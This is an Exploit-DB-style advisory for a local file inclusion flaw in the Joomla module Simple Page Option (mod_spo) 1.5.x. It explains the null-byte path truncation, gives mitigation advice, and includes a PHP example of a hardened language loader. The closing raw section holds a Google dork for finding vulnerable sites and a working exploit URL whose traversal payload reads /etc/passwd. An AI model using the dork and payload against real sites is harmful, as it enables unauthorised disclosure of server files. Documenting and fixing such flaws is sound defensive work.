Vendor: Simple Page Option (mod_spo)
By: SeguridadBlanca.Blogspot.com
CVSS: 7.5 (HIGH)
Type: Local File Inclusion (LFI)
CWE: 22
Product Name: Simple Page Option (mod_spo)
Affected Version From: 1.5.x
Affected Version To: 1.5.x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Backtrack and Windows 7
Year: 2011

Simple Page Option LFI

Simple Page Option (mod_spo) 1.5.x, a Joomla module, builds the path of the language file it includes by concatenating the user-supplied 'spo_site_lang' parameter of the 'email_sender.php' script with the module's 'languages' directory and a '.php' suffix, without validating the value. Directory traversal sequences in the parameter escape the 'languages' directory, so any '.php' file on the server can be included. Appending a null byte (e.g. 'spo_site_lang=../../../../../../../../../../etc/passwd%00') truncates the path before the '.php' suffix on PHP versions prior to 5.3.4 (which rejected null bytes in filesystem paths from that release on), so arbitrary non-PHP files such as /etc/passwd are included and their contents echoed to the attacker.

Mitigation:

The advisory suggests filtering the parameter with str_replace() or restricting access to the vulnerable script with .htaccess. A single str_replace() of '../' is not a robust fix on its own (one pass turns '....//' back into '../'); validate 'spo_site_lang' against an allow-list of language names, or at least reduce it with basename() and confirm that the resolved path still lies inside the 'languages' directory. No vendor patch is recorded (Patch Exists: NO).
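The vulnerable language loader described above, reconstructed from the snippet in the advisory, next to a hardened replacement. This is an added example and not mod_spo's own code: the 'languages' directory, the DS separator constant and the spo_site_lang parameter come from the module, while the function names, the allow-list pattern and the realpath() containment check are this example's own choices.

```php
<?php
// Added example (not mod_spo's own code): the vulnerable language loader
// reconstructed from the advisory, beside a hardened replacement.
// 'languages', DS and spo_site_lang are the module's; the function names,
// the allow-list pattern and the realpath() check are this example's own.

if (!defined('DS')) {
    define('DS', DIRECTORY_SEPARATOR);
}

/**
 * Vulnerable form, equivalent to the mod_spo 1.5.x snippet in the advisory:
 * the untrusted value is spliced into the path and only '.php' is appended.
 * Returns the path the module would hand to include().
 */
function spoLanguagePathVulnerable(string $sLang): string
{
    $dir = __DIR__ . DS . 'languages' . DS;
    return file_exists($dir . $sLang . '.php')
        ? $dir . $sLang . '.php'
        : $dir . 'english.php';
}

/**
 * Hardened form: spo_site_lang is a language *name*, never a path fragment.
 * 1. Allow-list the syntax (letters, digits, '-' and '_' only); this rejects
 *    '/', '\', '.' and NUL before any filesystem call is made.
 * 2. Resolve the candidate with realpath() and refuse anything outside
 *    'languages/' (defence in depth, e.g. against a stray symlink there).
 */
function spoLanguagePathHardened(string $sLang): string
{
    $base = realpath(__DIR__ . DS . 'languages');
    if ($base === false) {
        throw new RuntimeException('languages directory missing');
    }
    $default = $base . DS . 'english.php';

    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $sLang)) {
        return $default;
    }

    $resolved = realpath($base . DS . $sLang . '.php');
    if ($resolved === false || strpos($resolved, $base . DS) !== 0) {
        return $default;
    }
    return $resolved;
}

// Demonstration with the advisory's payload; the %00 in the URL reaches
// $_GET as a literal NUL byte, written here as "\0".
$payload = "../../../../../../../../../../etc/passwd\0";
echo spoLanguagePathVulnerable($payload), PHP_EOL;
// PHP < 5.3.4: the path is truncated at the NUL, file_exists() is true and
// /etc/passwd is include()d; text outside <?php tags is echoed verbatim.
// PHP >= 5.3.4: file_exists() rejects a NUL-bearing path, so the default is
// returned, but traversal to any real .php file on disk still works, e.g.
//   spoLanguagePathVulnerable('../../../../tmp/uploaded_file')
echo spoLanguagePathHardened($payload), PHP_EOL;   // english.php in every case
```

The allow-list is the actual fix; the realpath() comparison only catches a misconfigured 'languages' directory. Note that the hardened loader still never takes the traversal-to-a-.php-file route that the vulnerable one leaves open on modern PHP.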

Exploit-DB raw data:

# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7

Simple Page Option – LFI
Vulnerable-Code:
$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
    ? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
    : include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=

Expl0iting:
http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd%00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se

Reparing?:
Just filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.